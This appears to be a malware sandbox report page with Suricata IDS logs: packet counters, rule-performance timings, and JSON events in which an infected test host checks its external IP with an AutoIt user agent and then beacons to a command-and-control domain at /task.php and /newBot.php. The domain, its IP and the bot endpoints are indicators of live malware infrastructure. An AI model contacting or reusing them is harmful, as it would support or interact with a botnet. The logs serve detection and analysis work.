stats.log - (3072 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
------------------------------------------------------------------------------------
Date: 7/25/2019 -- 05:57:36 (uptime: 0d, 00h 00m 00s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 682
decoder.bytes                              | Total                     | 213040
decoder.invalid                            | Total                     | 1
decoder.ipv4                               | Total                     | 678
decoder.ethernet                           | Total                     | 682
decoder.tcp                                | Total                     | 585
decoder.udp                                | Total                     | 54
decoder.icmpv4                             | Total                     | 37
decoder.avg_pkt_size                       | Total                     | 312
decoder.max_pkt_size                       | Total                     | 1434
flow.tcp                                   | Total                     | 54
flow.udp                                   | Total                     | 8
decoder.ethernet.pkt_too_small             | Total                     | 1
tcp.sessions                               | Total                     | 54
tcp.syn                                    | Total                     | 54
tcp.synack                                 | Total                     | 54
tcp.rst                                    | Total                     | 52
detect.alert                               | Total                     | 108
detect.mpm_list                            | Total                     | 17
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 16
app_layer.flow.http                        | Total                     | 54
app_layer.tx.http                          | Total                     | 105
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 4
app_layer.flow.failed_udp                  | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 5
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65531
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7076896


eve.json - (175831 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
{"timestamp":"1900-01-00T00:00:09.368261+0000","flow_id":609649133461125,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3285,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":2218,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":68,"rdata":"51.141.32.51"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a1-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a3-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a9-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a5-130.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a13-130.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a12-131.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a28-129.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a18-128.akadns.org"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a11-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:09.368526+0000","flow_id":609649133461125,"pcap_cnt":12,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":3285,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":62611,"rdata":"a7-131.akadns.net"}}
{"timestamp":"1900-01-00T00:00:13.138205+0000","flow_id":609649133461125,"pcap_cnt":27,"event_type":"alert","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","tx_id":1,"alert":{"action":"allowed","gid":1,"signature_id":2012758,"rev":5,"signature":"ET INFO DYNAMIC_DNS Query to *.dyndns. Domain","category":"Misc activity","severity":3},"app_proto":"dns"}
{"timestamp":"1900-01-00T00:00:13.138205+0000","flow_id":609649133461125,"pcap_cnt":27,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44246,"rrname":"checkip.dyndns.org","rrtype":"A","tx_id":1}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.org","rrtype":"CNAME","ttl":369,"rdata":"checkip.dyndns.com"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"162.88.100.200"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.43.70"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.43.71"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"216.146.38.70"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"checkip.dyndns.com","rrtype":"A","ttl":369,"rdata":"162.88.96.194"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns3.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns4.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns2.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns5.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns6.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns1.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.138409+0000","flow_id":609649133461125,"pcap_cnt":28,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":44246,"rcode":"NOERROR","rrname":"dyndns.com","rrtype":"NS","ttl":62925,"rdata":"ns7.dynamicnetworkservices.net"}}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021378,"rev":3,"signature":"ET POLICY External IP Lookup - checkip.dyndns.org","category":"Potential Corporate Privacy Violation","severity":1}}
{"timestamp":"1900-01-00T00:00:13.314552+0000","flow_id":946471206462561,"pcap_cnt":38,"event_type":"http","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"162.88.100.200","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"checkip.dyndns.org","url":"\/","http_user_agent":"AutoIt","http_content_type":"text\/html"}}
{"timestamp":"1900-01-00T00:00:13.314748+0000","flow_id":946471206462561,"pcap_cnt":40,"event_type":"alert","src_ip":"162.88.100.200","src_port":80,"dest_ip":"10.0.2.15","dest_port":1049,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014932,"rev":2,"signature":"ET POLICY DynDNS CheckIp External IP Address Server Response","category":"Potentially Bad Traffic","severity":2},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.314748+0000","flow_id":946471206462561,"pcap_cnt":40,"event_type":"fileinfo","src_ip":"162.88.100.200","src_port":80,"dest_ip":"10.0.2.15","dest_port":1049,"proto":"TCP","http":{"hostname":"checkip.dyndns.org","url":"\/","http_user_agent":"AutoIt","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":102},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":102,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:13.317966+0000","flow_id":609649133461125,"pcap_cnt":41,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":1292,"rrname":"rektware19.temp.swtest.ru","rrtype":"A","tx_id":2}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"rektware19.temp.swtest.ru","rrtype":"A","ttl":369,"rdata":"77.222.40.79"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns1.spaceweb.ru"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns4.spaceweb.pro"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns2.spaceweb.ru"}}
{"timestamp":"1900-01-00T00:00:13.318131+0000","flow_id":609649133461125,"pcap_cnt":42,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":1292,"rcode":"NOERROR","rrname":"swtest.ru","rrtype":"NS","ttl":17689,"rdata":"ns3.spaceweb.pro"}}
{"timestamp":"1900-01-00T00:00:13.412598+0000","flow_id":370732987964628,"pcap_cnt":49,"event_type":"alert","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:13.412598+0000","flow_id":370732987964628,"pcap_cnt":49,"event_type":"http","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/task.php","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:14.620642+0000","flow_id":575394622079958,"pcap_cnt":64,"event_type":"alert","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2008350,"rev":7,"signature":"ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:14.620642+0000","flow_id":575394622079958,"pcap_cnt":64,"event_type":"http","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/task.php","http_user_agent":"AutoIt"}}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"alert","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2001891,"rev":19,"signature":"ET USER_AGENTS Suspicious User Agent (agent)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"http","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html"}}
{"timestamp":"1900-01-00T00:00:14.646940+0000","flow_id":1950028969959987,"pcap_cnt":65,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"77.222.40.79","dest_port":80,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":404,"length":1067},"app_proto":"http","fileinfo":{"filename":"\/newBot.php","gaps":false,"state":"CLOSED","stored":false,"size":111,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:15.620531+0000","flow_id":1950028969959987,"pcap_cnt":74,"event_type":"fileinfo","src_ip":"77.222.40.79","src_port":80,"dest_ip":"10.0.2.15","dest_port":1051,"proto":"TCP","http":{"hostname":"rektware19.temp.swtest.ru","url":"\/newBot.php","http_user_agent":"agent","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":404,"length"

This file has been truncated. Go here to download in full.


keyword_perf.log - (13174 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 7/25/2019 -- 05:57:36
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             41224616        7800            7800            538588          5285.00         5285.00         0.00           
  content          90605300        16018           9816            294042          5656.00         5654.00         5660.00        
  pcre             9859326         1574            780             64814           6263.00         5831.00         6688.00        
  byte_test        524676          95              67              26226           5522.00         5839.00         4764.00        
  byte_jump        86378           13              13              22484           6644.00         6644.00         0.00           
  isdataat         18798           4               0               4786            4699.00         0.00            4699.00        
  flowbits         1969164         370             54              44454           5322.00         7777.00         4902.00        
  urilen           4425262         836             54              29376           5293.00         5063.00         5309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             41224616        7800            7800            538588          5285.00         5285.00         0.00           
  flowbits         1554362         317             1               28110           4903.00         5178.00         4902.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          8434606         1449            792             29944           5820.00         5736.00         5922.00        
  pcre             70690           7               0               14680           10098.00        0.00            10098.00       
  byte_test        524676          95              67              26226           5522.00         5839.00         4764.00        
  byte_jump        86378           13              13              22484           6644.00         6644.00         0.00           
  isdataat         18798           4               0               4786            4699.00         0.00            4699.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         414802          53              53              44454           7826.00         7826.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          20130632        3661            2082            53388           5498.00         5389.00         5642.00        
  pcre             6205248         1042            780             31304           5955.00         5831.00         6322.00        
  urilen           4425262         836             54              29376           5293.00         5063.00         5309.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7213046         1248            156             31230           5779.00         5865.00         5767.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5292            1               0               5292            5292.00         0.00            5292.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1122578         208             0               36518           5397.00         0.00            5397.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34414700        5943            4638            83202           5790.00         5754.00         5918.00        
  pcre             3264320         473             0               64814           6901.00         0.00            6901.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4656514         784             315             30142           5939.00         6264.00         5720.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1379892         262             262             22916           5266.00         5266.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          9126506         1718            885             294042          5312.00         5642.00         4961.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2732612         476             422             70750           5740.00         5720.00         5898.00        
  pcre             319068          52              0               15778           6135.00         0.00            6135.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          304296          57              55              18648           5338.00         5347.00         5095.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1078998         210             208             27142           5138.00         5137.00         5168.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: dns_query
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5628            1               1               5628            5628.00         5628.00         0.00           


unified2.alert.1564034256 - (39229 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
4
ݶV

5j

ÝNRT5'ðE@n€"/
